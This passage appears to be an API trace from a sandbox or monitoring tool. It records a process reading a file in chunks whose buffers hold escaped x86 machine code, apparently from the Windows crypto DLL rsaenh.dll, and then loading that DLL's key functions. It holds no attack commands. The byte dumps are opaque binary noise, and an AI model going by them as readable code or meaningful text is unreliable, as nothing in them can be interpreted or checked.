\x00 \x80\xeb:\x8bI\x08\x89\x0e\xeb!\xf7\xde\x1b\xf6\x81\xe6\xea\x00\x00\x00\x8b\xce\xeb#\x8bM\x14\x85\xc9t\x129\x18r\x0e\x8bU\x1c\x8bR\x04\x89\x11\x89\x183\xc9\xeb\x0c\xf7\xd9\x1b\xc9\x81\xe1\xea\x00\x00\x00\x89\x18_[3\xc0\x85\xc9\x0f\x94\xc0\x8b\xf0\x85\xf6u\x07Q\xff\x15\xc4\x11\x00h\x8b\xc6^]\xc2\x18\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xecSV\x8bu\x083\xc0\xf6\x06 Wt\x01@\x83}\x0c\x02u\x13\xbb\x84\x12\x00h\xbf|\x12\x00h\xc7E\x08t\x12\x00h\xeb\x17\x83}\x0c\x01uP\xbbl\x12\x00h\xbfd\x12\x00h\xc7E\x08\\x12\x00h\x83\xbeX\x01\x00\x00\x00t\x15j\x00P\xffu\x0ch\xb0\x1a\x03hV\xe8\xcb\xab\x00\x00\x85\xc0u&W\x8b=\xc4\x10\x00h\x81\xc6@\x01\x00\x00\xff6\xff\xd7\xffu\x08\xff6\xff\xd7S FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x8bu \x85\xf6t\x1d3\xc9;\xc1v\x17\x8dE\xdc+\xf0\x8dD
\xdc\x8a\x1c\x060\x18A;M\x18r\xf1\x8b]\xd8\x8b}\x08\x81\xff\x01f\x00\x00\x0f\x84\xf1\x00\x00\x00\x81\xff\x02f\x00\x00\x0f\x84\xbc\x00\x00\x00\x81\xff\x03f\x00\x00\x0f\x84\x87\x00\x00\x00\x81\xff f\x00\x00t\x7f\x81\xff
f\x00\x00vm\x81\xff\x10f\x00\x00v6;\xfaua\x8bM\x18\x8bu\xd0\x8b\xc1\xc1\xe9\x02\x83}$\x01\x8d}\xect\x03\x8bu\xd4\xf3\xa5\x8b\xc8\x8dE\xecP\xffu\x18\x83\xe1\x03S\xf3\xa4\xe8\x18\xec\x00\x00\xe9\xb2\x00\x00\x00\x83}$\x01u\x15j\x01S\x8dE\xdcP\x8dE\xecP\xe8\x8d\xea\x00\x00\xe9\x9d\x00\x00\x00j\x00S\xffu\xd4\x8dE\xecP\xe8y\xea\x00\x00\xe9\x83\x00\x00\x00\xbe\x08\x00 \x80\xe9\xc7\x00\x00\x00\x83}$\x01u\x12j\x01S\x8dE\xdcP\x8dE\xecP\xe8d\xc6\x00\x00\xebgj\x00S\xffu\xd4\x8dE\xecP\xe8S\xc6\x00\x00\xebP\x83}$\x01u FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x01\x00\x00\x8dE\xf4PV\xffu\x18\xe8\xcd\xcb\xff\xff\x85\xc0\x0f\x84D\x01\x00\x009u\xf0\x8bE\xf4\x8bM\x14\x8d<\x01u\x17W\xe8@a\x01\x00\x8b\xd8;\xde\x89]\xecu\x11j\x08^\xe9\xb6\x01\x00\x00\x8b]\xf8\x83\xc3\x08\x89]\xec\x8dE\xf4PS\xffu\x18\xe8\x8a\xcb\xff\xff\x85\xc0\x0f\x84\x01\x01\x00\x009u\x10t\x1eVW\x8dE\xf4PSVj\x01V\xffu\x10\xffu\x08\xe8\xd4\xab\xff\xff;\xc6\x0f\x85\xb8\xfd\xff\xff\x83}\xf0\x00\x8bM\xf4\x8dY\x08\x0f\x85<\x01\x00\x00\x8b}\x1c\x8bu\xec\x83\xc7\x08\xe96\x01\x00\x00\x8a\x06<\x03t\x08<\x04\x0f\x85\xb2\x00\x00\x00\x8bE\xfc\x8b@\x10\x85\xc0\x0f\x84\xb8\x00\x00\x00\x8bX\x08\x8bu\x1c\x83\xc3\x07\xc1\xeb\x03\x83\xc3\x14\x85\xf6\x0f\x84\x15\x01\x00\x00\x8bM 9\x19\x0f\x82
\x01\x00\x00\x8b\x08\x8bU\xf8\x89J\x08\x8bH\x08\x89J\x0c\x8bH\x10\x89J\x10\x8bH\x08\x83\xc1\x07\xc1\xe9\x03\x8dp\x14\x8b\xc1\xc1\xe9\x02\x8d FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => k\x83E\x90\x08u2\x8b\xb5|\xff\xff\xff\x8dF\x08;\xc6r\x18P\xff\x15\x18 \x03h;\xc7\x89E\x90t\x0f\xc7\x00Heap\x83E\x90\x089}\x90u\x08j\x08[\xe9\x85\x02\x00\x00\x8d\x85|\xff\xff\xffP\x8dE\x90P\x8bE\x94\xffp\x1c\xe8\x8d\xa5\xff\xff;\xc7\x0f\x85c\xfc\xff\xff\xffu\x88\x8bE\x94\xffu\x98\xffu\x90\xffp\x1c\xe8x\xa9\xff\xff;\xc7\x0f\x85G\xfc\xff\xff\xff\xb5t\xff\xff\xff\x8dE\x9cP\xffu\x90\x8bE\x94\xffp\x1c\xe8X\xa9\xff\xff;\xc7\x0f\x85'\xfc\xff\xff\x8bE\x94\x8bx\x10\x8b\x8d|\xff\xff\xff\x8bu\x90\x8b\xc1\xc1\xe9\x02\xf3\xa5\x8b\xc8\x83\xe1\x03\xf3\xa4\x8bE\x94\x83H \x02\x8bM\x80\x8b}\x8c\x8b\xd1\xc1\xe9\x02\x8b\xb5x\xff\xff\xff3\xc0\xf3\xab\x8b\xca\x83\xe1\x03\xf3\xaa\x8bM\x88\x8b}\x98\x8b\xd1\xc1\xe9\x023\xc0\xf3\xab\x8b\xca\x83\xe1\x03\xf3\xaa\x8bE\x94VS\xffp\x10\xffp\x18\xffp\x1c\xe8\x94\xf8\xff\xff\x85\xc0\xe9\xb1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xeb\x07\xc7E\xb8p\xf0\x02h\x8bU\x143\xf6\x85\xd2v\x13\x8bE\x10\x8dD\x10\xff\x8a\x08\x88L5\xbcFH;\xf2r\xf4\x8b]\x1c\x8b\xca\x8b\xfb\x8du\xbc3\xc0\xf3\xa6t\x05\x1b\xc0\x83\xd8\xff\x85\xc0u~\xf6E\x18\x01\x8b\xca\x89M\xb4uG\x8bu\xb8\x85\xf6t@\x8b\x06\x808\x00t9\x89u\xb8\x0f\xb6\x18\x8dx\x01\x8bE\x1c\x8d4\x02\x8b\xcb3\xc0\xf3\xa6t\x05\x1b\xc0\x83\xd8\xff\x85\xc0t\x13\x83E\xb8\x04\x8bE\xb8\x8b\x00\x808\x00u\xd5\x8bM\xb4\xeb\x03\x8d\x0c\x13\x8b]\x1c\x80<\x19\x00u&\x8bE\x08\x8b@\x0c\x80<\x18\x00u\x1a\x80|\x18\xff\x01u\x13AH\xeb\x07\x80<\x19\xffu A;\xc8r\xf53\xc0\xeb\x0c\xb8\x06\x00 \x80\xeb\x05\xb8\x02\x00 \x80\x8bM\xfc_^[\xe8\x92n\x00\x00\xc9\xc2\x18\x00\x10\xdd\x00h\x19\xdd\x00h"\xdd\x00h+\xdd\x00h\x17\xde\x00h\x17\xde\x00h\x17\xde\x00h4\xdd\x00h\x17\xde\x00h\x17\xde\x00h\x17 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => _j\x06\x8dM\xc0Q\x8dM\xe4Q\xffu\xc8\x89}\xc0P\xffU\xb8;\xc3u\x06f9}\xc0t8\x83\xf82\x8bu\xcctSW\x8dE\xe4P\x8dF8P\x8dFXP\x8d\x86d\x01\x00\x00P\xe8\xb7\xe9\xff\xff;\xc3uSSj\x06W\x8dE\xe4P\xffu\xc8\xffu\xd4\xffU\xc4\xeb\x03\x8bu\xccW\xe8\x0c1\x01\x00;\xc3\x89\x86H\x01\x00\x00u\x08j\x08^\xe9\x1a\x01\x00\x00\x8du\xe4\xe9\xff\x00\x00\x00\x8dE\xd8PSSh\x03\x80\x00\x00\xffv\x0c\xe8\xd9\x86\xff\xff\x85\xc0u
\xff\x15\xc8\x11\x00h\x8b\xf0\xe9\xee\x00\x00\x00S\x8dE\xecPj\x02\xffu\xd8\xffv\x0c\xe8k\xb7\xff\xff\x85\xc0t\xdd\x8dE\xbcPj\x01\xffv\x0c\xffu\xd8\xe8\xf0$\x00\x00;\xc3t\x11= \x00 \x80u\xc7\xbe\x02\x00 \x80\xe9\xb2\x00\x00\x00\x8bE\xbc\xffu\xd0\x8b=\xbc\x11\x00h\x83`\x18\xfe\xff\xd7@P\xe8y0\x01\x00;\xc3\x89E\xe0tw\xffu\xd0P\xff\x15 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xff\xff\xff6\xe8\xcc!\x01\x00\x8bu\x18\x89\x06\x8bE\x10\xff0\xe8T!\x01\x00;\xc3\x89\x07\x0f\x84r\xff\xff\xff\xff6\xe8C!\x01\x00;\xc3\x8bM\x0c\x89\x01\x0f\x84^\xff\xff\xff\xffu\xf0\xffu\xf8h\x01\x00\x01\x00\xffu\x1cP\xff7\xe8 \xfc\x00\x00\x8b\xf0\xf7\xde\x1b\xf6\x81\xe6\xb1\xfa\xff\xff\x81\xc6O\x05\x00\x00\x8dE\xdcP\x8d\x85p\xff\xff\xffP\xe8\xfbz\x01\x00\x85\xc0u\x0e;\xf3u
\xffu\xe4\xe8\xf6F\x00\x00\x8b\xf09]\xd0t"\x8dE\xdcP\x8d\x85\xc0\xfe\xff\xffP\xe8\xaev\x01\x00\x85\xc0u\x0e;\xf3u
\xffu\xe4\xe8\xcfF\x00\x00\x8b\xf09]\xect\x08\xffu\xec\xe8\xfb \x01\x009]\xf8t\x08\xffu\xf8\xe8\xee \x01\x009]\xf0t\x08\xffu\xf0\xe8\xe1 \x01\x00;\xf3t\x1b\x8b?;\xfbt\x06W\xe8\xd1 \x01\x00\x8bE\x0c\x8b\x00;\xc3t\x06P\xe8\xc2 \x01\x00_\x8b\xc6^[\xc9\xc2\x18\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xdbC\x89]\xa8\x8bE\x18=\x00\x04\x00\x00r0P\x8dE\xccP\x8dE\xc8P\x8dE\xc4P\x8dE\xdcP\x8dE\xe0P\xe8\\xee\xff\xff\x89E\xe4\x85\xc0\x0f\x85\xfd\x01\x00\x00\x89]\xd0\x8b}\xdc\xe9\x8f\x00\x00\x00\x89E\xa4\x8dE\xa4P\x8dE\xc8P\x8dE\xc4P\xe8\xa9\xef\x00\x00\x85\xc0u\x0c\xc7E\xe4 \x00 \x80\xe9\xce\x01\x00\x00\xffu\xc4\xe8\x01\x11\x01\x00\x89E\xe0\x85\xc0u\x0c\xc7E\xe4\x08\x00\x00\x00\xe9\xb3\x01\x00\x00\x89]\xd0\xffu\xc8\xe8L\x11\x01\x00\x89E\xccP\xe8\xda\x10\x01\x00\x8b\xf8\x89}\xdc\x85\xfft\xd7\x8d\x86d\x01\x00\x00\x838\xfft\x10\x89E\x90\xc7E\x94o\xd7\x00h\x8dE\x90\x89E\xc0h\x01\x00\x01\x00\xffu\x18W\xffu\xe0\xffu\xc0\xe8\xf2\xe8\x00\x00\x85\xc0t\x89\x8bE\xcc\x83\xc0\xecP\x8dG\x14P\xe8\x1c\x11\x01\x00\x89E\xd8\x85\xc0\x0f\x85E\x01\x00\x00PSSW\xffu\xe0\xe8s\xfc\xff\xff\x89E\xd8\x85\xc0\x0f\x85.\x01\x00\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x85\xe2\x00\x00\x00\xe8\x1f\xf7\xff\xff\x85\xc0\x0f\x84\xd5\x00\x00\x00\x8d\x85\xa4\xfe\xff\xffP\xe8\x8e\x80\x00\x00j\x03h\x1c\xf8\x02h\x8d\x85\xa4\xfe\xff\xffP\xe8K\x8c\x00\x00\x8d\x85|\xff\xff\xffP\x8d\x85\xa4\xfe\xff\xffP\xe8h\x8d\x00\x00\x8b\xcb\xbf \xf8\x02h\x8d\xb5|\xff\xff\xff3\xc0\xf3\xa7\x0f\x85\x8c\x00\x00\x00\x8d\x85\xd4\xfd\xff\xffP\xe85\x8e\x00\x00j\x03h@\xf8\x02h\x8d\x85\xd4\xfd\xff\xffP\xe8R\xbd\x00\x00\x8d\x85L\xff\xff\xffP\x8d\x85\xd4\xfd\xff\xffP\xe8\xbf\xc5\x00\x00j\x0cY\xbfD\xf8\x02h\x8d\xb5L\xff\xff\xff3\xc0\xf3\xa7uF\x8d\x85\x04\xfd\xff\xffP\xe8\x7f\x8e\x00\x00j\x03ht\xf8\x02h\x8d\x85\x04\xfd\xff\xffP\xe8\x0c\xbd\x00\x00\x8d\x85\x0c\xff\xff\xffP\x8d\x85\x04\xfd\xff\xffP\xe8Y\xbe\x00\x00j\x10Y\xbfx\xf8\x02h\x8d\xb5\x0c\xff\xff\xff3\xc0\xf3\xa7t
\xb8 \x00 \x80\xe9\xfa\x01\x00\x00j\x00h\x8c\xf6\x02hj\x05h\x84\xf6\x02hj FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x04\x00\x00\x8br\x10\x8b\xd1\xc1\xe9\x02\x8d\xb80\x03\x00\x00\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x8b\x8bH\x03\x00\x00\x89H\x04\x8b\x8bL\x03\x00\x00\x89H\x08\x8b\x8bP\x03\x00\x00\x89H\x0c\x8b\x8bT\x03\x00\x00\x89H\x10\x8b\x8bX\x03\x00\x00\x89H\x14\x8b\x8b\\x03\x00\x00\x89H\x18\x8b\x8b4\x01\x00\x00\x89\x88\x1c\x01\x00\x00\x8b\xd1\xc1\xe9\x02\x8ds4\x8dx\x1c\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x8b\x8b8\x02\x00\x00\x89\x88 \x02\x00\x00\x8b\xd1\xc1\xe9\x02\x8d\xb38\x01\x00\x00\x8d\xb8 \x01\x00\x00\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x8b\x8bD\x03\x00\x00\x89\x88,\x03\x00\x00\x8d\xb8,\x02\x00\x00\x8b\xc1\xc1\xe9\x02\x8d\xb3D\x02\x00\x00\xf3\xa5\x8b\xc8\x83\xe1\x03\xf3\xa4\xe9\x1b\x02\x00\x00\x8bJ\x0c\x89\x880\x04\x00\x00\x8br\x10\x8b\xd1\xc1\xe9\x02\x8d\xb80\x03\x00\x00\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x8b\x8bH\x03\x00\x00\x89H\x04\x8b\x8bL\x03\x00\x00\x89H\x08\x8b\x8bP\x03\x00\x00\x89H\x0c\x8b\x8bT\x03 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x00+\xc1\x89u\xcc\x89U\xd8\x89U\xd0\x89U\xc4\x89U\xc0\x0f\x84H\x01\x00\x00\x83\xe8\x04t
\xbe\x08\x00 \x80\xe9\x97\x01\x00\x00\xf6\x834\x04\x00\x00\x01\x8b{\x0c\x8bC\x04\x89}\xd4\x89E\xc8\x0f\x84\xcd\x00\x00\x00\xffu\x14\x8dE\xf4P\x8dE\xd0P\x8dE\xdcP\x8dE\xccP\x8dE\xd4P\x8dE\xc4PS\xe8<\xfe\xff\xff\x85\xc0\x0f\x852\x01\x00\x00\x8bE\xcc\xf6E\x14\x01t\x07\xc7E\xc0\x01\x00\x00\x00\x8dM\xd8Qj\x01j\x00P\xff6W\xffu\xc0\xffu\xc8\xe8\xf8G\xff\xff\x85\xc0\x0f\x85\x03\x01\x00\x00\x81}\xc8\x02f\x00\x00u
\x8bE\xd8\xc7@l\x80\x00\x00\x00\x8b}\xd8\x8bM\xd0\x8b\xc1\xc1\xe9\x02\x83\xc7D\x8du\xdc\xf3\xa5\x8b\xc8\x83\xe1\x03\xf3\xa4\x8bE\xd8\x8bM\xd0\x89H@\x8b[\x18\x85\xdbt\x19\x8b}\xd8\x8b\xcb\x8b\xc1\xc1\xe9\x02\x83\xc7\x1c\x8du\xf4\xf3\xa5\x8b\xc8\x83\xe1\x03\xf3\xa4j\x00\xffu\xd8\xffu\xbc\xe8\xdbI\xff\xff\x85\xc0\x0f\x85\x85 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x8b@\xfc\x89\x85\xdc\xfd\xff\xffj\x14Y3\xc0\x8d\xbd\xd0\xfc\xff\xff\xf3\xab\xc7\x85\xd0\xfc\xff\xff \x04\x00\xc0\x8bE\x04\x89\x85\xdc\xfc\xff\xff\x8d\x85\xd0\xfc\xff\xff\x89E\xf8\x8d\x85(\xfd\xff\xff\x89E\xfc\xa1\x84\x18\x03h\x89\x85 \xfd\xff\xff\xa1\x80\x18\x03h\x89\x85$\xfd\xff\xffj\x00\xff\x15\xd4\x10\x00h\x8dE\xf8P\xff\x15\xd8\x10\x00hh\x02\x05\x00\x00\xff\x15\xdc\x10\x00hP\xff\x15\xe0\x10\x00h_\xc9\xc3\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xecV3\xf69u\x0cu\x0e95\x9c\x1a\x03h~-\xff
\x9c\x1a\x03h\x83}\x0c\x01\xa1\xf0\x11\x00h\x8b\x00\xa3\x00 \x03hu=h\x80\x00\x00\x00\xff\x15\xec\x11\x00h;\xc6Y\xa3\x08 \x03hu\x043\xc0\xebg\x890\xa1\x08 \x03hh\x08\xf0\x02hh\x00\xf0\x02h\xa3\x04 \x03h\xe8\xac\x01\x00\x00\xff\x05\x9c\x1a\x03hY\xeb?9u\x0cu;\xa1\x08 \x03h;\xc6t2\xeb\x13\x8b
\x04 \x03h\x8b ; FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => t3\xc63\xd6%\xfc\xfc\xfc\xfc\x81\xe2\xcf\xcf\xcf\xcf\x8a\xd8\x8a\xcc\xc1\xca\x04\x8b\xab\xb8\x18\x00h\x8a\xda3\xfd\x8b\xa9\xb8\x1a\x00h3\xfd\x8a\xce\xc1\xe8\x10\x8b\xab\xb8\x19\x00h3\xfd\x8a\xdc\xc1\xea\x10\x8b\xa9\xb8\x1b\x00h3\xfd\x8bl$\x1c\x8a\xce%\xff\x00\x00\x00\x81\xe2\xff\x00\x00\x00\x8b\x9b\xb8\x1e\x00h3\xfb\x8b\x99\xb8\x1f\x00h3\xfb\x8b\x98\xb8\x1c\x00h3\xfb\x8b\x9a\xb8\x1d\x00h3\xfb\x8bEx3\xdb\x8bU|3\xc73\xd7%\xfc\xfc\xfc\xfc\x81\xe2\xcf\xcf\xcf\xcf\x8a\xd8\x8a\xcc\xc1\xca\x04\x8b\xab\xb8\x18\x00h\x8a\xda3\xf5\x8b\xa9\xb8\x1a\x00h3\xf5\x8a\xce\xc1\xe8\x10\x8b\xab\xb8\x19\x00h3\xf5\x8a\xdc\xc1\xea\x10\x8b\xa9\xb8\x1b\x00h3\xf5\x8bl$\x1c\x8a\xce%\xff\x00\x00\x00\x81\xe2\xff\x00\x00\x00\x8b\x9b\xb8\x1e\x00h3\xf3\x8b\x99\xb8\x1f\x00h3\xf3\x8b\x98\xb8\x1c\x00h3\xf3\x8b\x9a\xb8\x1d\x00h3\xf3\x8bT$\x14\xd1\xce\x8b\xc73\xfe\x81\xe7\xaa\xaa\xaa\xaa3 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x83\xf0\xff#\xc2\x03\xcd\x03\xc83\xc0f\xc1\xc1\x02f\x8b\xc1\x8b\xe8\x83\xf0\xff#\xeb#\xc7\x03\xd0\x8bF\x04\x03\xd0\xc1\xe8\x10\x03\xd5\x03\xf83\xc0f\xc1\xc2\x03f\x8b\xc2\x8b\xe8\x83\xf0\xff#\xc3#\xe9\x03\xf8\x03\xfd\x83\xc6\x08f\xc1\xc7\x05\x8b\xc7\xf7\xd0\x8b\xef#\xc1#\xea\x03\xd8\x8b\x06\x03\xdd\x03\xd8\xc1\xe8\x10\x8b\xef\x03\xc83\xc0f\xd1\xc3f\x8b\xc3#\xe8\x83\xf0\xff#\xc2\x03\xcd\x03\xc83\xc0f\xc1\xc1\x02f\x8b\xc1\x8b\xe8\x83\xf0\xff#\xeb#\xc7\x03\xd0\x8bF\x04\x03\xd0\xc1\xe8\x10\x03\xd5\x03\xf83\xc0f\xc1\xc2\x03f\x8b\xc2\x8b\xe8\x83\xf0\xff#\xc3#\xe9\x03\xf8\x03\xfd\x83\xc6\x08f\xc1\xc7\x05\xe9h\x06\x00\x00\x8d\xa4$\x00\x00\x00\x00\x90\x83\xc6xf\xc1\xcf\x05\x8b\xc2\x8b\xea\x83\xf0\xff#\xe9#\xc3f\xc1\xca\x03\x03\xc5+\xf8\x8bF\x04\x8b\xe9+\xd0\xc1\xe8\x10+\xf8\x8b\xc1\xf7\xd5#\xc3#\xef\x03\xe8f\xc1\xc9\x02+\xd5\x8b\xc3\x8b\xef\xf7\xd0#\xeb#\xc2f\xd1\xcb\x03 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => h34\x9d\xd81\x00h\x8b]\xf8\xc1\xeb\x08\x0f\xb6\xdb34\x9d\xd8-\x00h\x0f\xb6]\xf434\x9d\xd8)\x00h\x0f\xb6]\xf2\x89p\x08\x0f\xb6u\xf7\x8b4\xb5\xd85\x00h34\x9d\xd81\x00h\x0f\xb6\xd6\x8b\x1c\x95\xd8-\x00h\x0f\xb6U\xf83\xf334\x95\xd8)\x00h\x8bX\x04\x89p\x0c\x8b0\x8bQ\x083\xd6\x8bq\x0c3\xf3\x8bX\x08\x89u\xf0\x8bq\x103\xf3\x8bX\x0c\x89u\xf4\x8bq\x14\x89U\xec3\xf3\x89u\xf8\x8b]\xf4\xc1\xee\x18\x8b4\xb5\xd85\x00h\xc1\xeb\x10\x0f\xb6\xdb34\x9d\xd81\x00h\x8b]\xf0\xc1\xeb\x08\x0f\xb6\xdb34\x9d\xd8-\x00h\x0f\xb6\xda34\x9d\xd8)\x00h\x8b]\xf8\x890\xc1\xeb\x10\x0f\xb6\xdb\x8b\xf2\xc1\xee\x18\x8b4\xb5\xd85\x00h34\x9d\xd81\x00h\x8b]\xf4\xc1\xeb\x08\x0f\xb6\xdb34\x9d\xd8-\x00h\x0f\xb6]\xf034\x9d\xd8)\x00h\x0f\xb6]\xee\x89p\x04\x8bu\xf0\xc1\xee\x18\x8b4\xb5\xd85 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xc7E\xe8\x02\x00\x00\x00\xeb\x03\x8dI\x00\x8bQ\xf83\x10\x8bq\xfc3p\x04\x89u\xf0\x8b9\x8bp\x083\xf7\x89u\xf4\x8bY\x043X\x0c\x8bu\xf0\x0f\xb6}\xf6\xc1\xee\x18\x8b4\xb5\xd8E\x00h34\xbd\xd8A\x00h\x0f\xb6\xff34\xbd\xd8=\x00h\x0f\xb6\xfa34\xbd\xd89\x00h\x89U\xec\x890\x8bu\xf4\xc1\xee\x18\x8b4\xb5\xd8E\x00h\x89]\xf8\x0f\xb6}\xfa34\xbd\xd8A\x00h\x0f\xb6\xd6\x8b<\x95\xd8=\x00h\x8bU\xf03\xf7\x0f\xb6\xfa34\xbd\xd89\x00h\x0f\xb6}\xee\x89p\x04\x8b\xf3\xc1\xee\x18\x8b4\xb5\xd8E\x00h34\xbd\xd8A\x00h\x0f\xb6\xd6\x8b<\x95\xd8=\x00h\x8bU\xf43\xf7\x0f\xb6\xfa34\xbd\xd89\x00h\x0f\xb6}\xf2\x89p\x08\x0f\xb6u\xef\x8b4\xb5\xd8E\x00h34\xbd\xd8A\x00h\x0f\xb6\xd634\x95\xd8=\x00h\x0f\xb6\xd3\x8b<\x95\xd89\x00h\x8bX\x043\xf7\x8bx\x08\x89p\x0c\x8b0\x8bQ\xe83 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xc8\x8b\xf1\xc1\xe9\x02\x8d|\x05\xbc3\xc0\xf3\xab\x8b\xce\x83\xe1\x03\xf3\xaa\x8b]\xb4\x8bu\xb8\xb9\x07\x00\x00\x00+\xcb\x8a\\x15\xbc\xb8\x01\x00\x00\x00\xd3\xe0\x8a\xc8\xfe\xc9
\xd8\xf6\xd1"\xcb\x83\xfa7\x88L\x15\xbc[v6\x8dU\xbcRV\xe8\x91a\x00\x003\xc0\x89E\xbc\x89E\xc0\x89E\xc4\x89E\xc8\x89E\xcc\x89E\xd0\x89E\xd4\x89E\xd8\x89E\xdc\x89E\xe0\x89E\xe4\x89E\xe8\x89E\xec\x89E\xf0\x8bN\x10\x8bV\x14\x8dE\xbcPV\x89M\xf4\x89U\xf8\xe8Oa\x00\x00\x8bM\xfc_\xc7F\x18\x01\x00\x00\x003\xc0^\xe8\xc5\xae\xff\xff\x8b\xe5]\xc2\x0c\x00\xcc\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x8bE\x083\xc9\xc7\x00g\xe6 j\xc7@\x04\x85\xaeg\xbb\xc7@\x08r\xf3n<\xc7@\x0c:\xf5O\xa5\xc7@\x10\x7fR\x0eQ\xc7@\x14\x8ch\x05\x9b\xc7@\x18\xab\xd9\x83\x1f\xc7@\x1c\x19\xcd\xe0[\x89H \x89H$]\xc2\x04\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtQueryInformationFile |
FileHandle => 0x00000190 FileInformation => \xd0\x10\x03\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtSetInformationFile |
FileHandle => 0x00000190 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrLoadDll |
Flags => 1306532 BaseAddress => 0x68000000 FileName => rsaenh.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPAcquireContext FunctionAddress => 0x6800fb46 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPReleaseContext FunctionAddress => 0x6800f017 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGenKey FunctionAddress => 0x6800afb1 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
